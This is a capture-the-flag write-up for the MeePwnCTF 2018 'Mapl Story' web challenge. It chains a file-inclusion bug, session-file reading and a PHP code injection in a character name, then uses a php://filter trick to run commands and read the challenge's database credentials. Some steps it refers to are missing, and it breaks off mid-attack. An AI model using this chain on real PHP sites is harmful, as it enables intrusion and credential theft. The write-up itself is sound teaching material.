Mapl Story was part of the MeePwnCTF Quals 2018 and consists of a webpage where you can name a “character” and train a pet a command. You get the code but the config is censored.

## Have a look around

First of let’s create an account, e.g. foobar@example.org/foobar123, set any name, we’ll change that later.

Sign in and have a look at your cookies, you’ll see your PHPSESSID and a _role. _role is generated using either sha256("admin".$salt) or (in this case) sha256("user".$salt). We need the salt to continue here.

Have a look around the few pages on the site. The game page is completely irrelevant, just a gimmick.

## File inclusion vulnerability

There is a file inclusion vulnerability in index.php, so have a look at e.g. /index.php?page=/etc/group. Unfortunately it uses a GET variable which is heavily escaped so for now there isn’t really much we can directly do with this bug.

## Let’s get salty

Let’s have a look at /index.php?page=/var/lib/php/sessions/sess_PHPSESSID (replace PHPSESSID).

## Choose a new name

Well, if you looked carefully at the session file you would have noticed the clear-text action part, which contains the last logged line. There is one log-line in the code-base which we can control, when giving a player a pet the log will contain the character name at the end.

I think <?=include"\$_COOKIE[0] is a beautiful name, don’t you think? So what does this do?… It allows us to include files using a cookie named 0. Since cookies are not filtered inside the script we now have full control over the file inclusion.

Now that everything is prepared we need a final way to execute the base64-encoded php code we trained our pet earlier, but that’s really simple, PHP actually has a built-in helper for that: php://filter/convert.base64-decode/resource=path/to/file.

In case of foobar@example.org (considering the upload path mentioned before) a command-execution now looks like this:

assets
character.php
dbconnect.php
die.php
game.php
home.php
index.php
logout.php
mapl_library.php
register.php
setting.php
style.css
1

## Attack!

From there we can take a look at dbconnect.php (&1=cat%20dbconnect.php) and we’ll find the mysql username and password:

define('DBUSER', 'mapl_story_user');
define('DBPASS', 'tsu_tsu_tsu_tsu');
define('DBNAME', 'mapl_story');

Now let’s see what’s in the mapl_config table that is mentioned a few times in the script (it should at least contain the encryption key):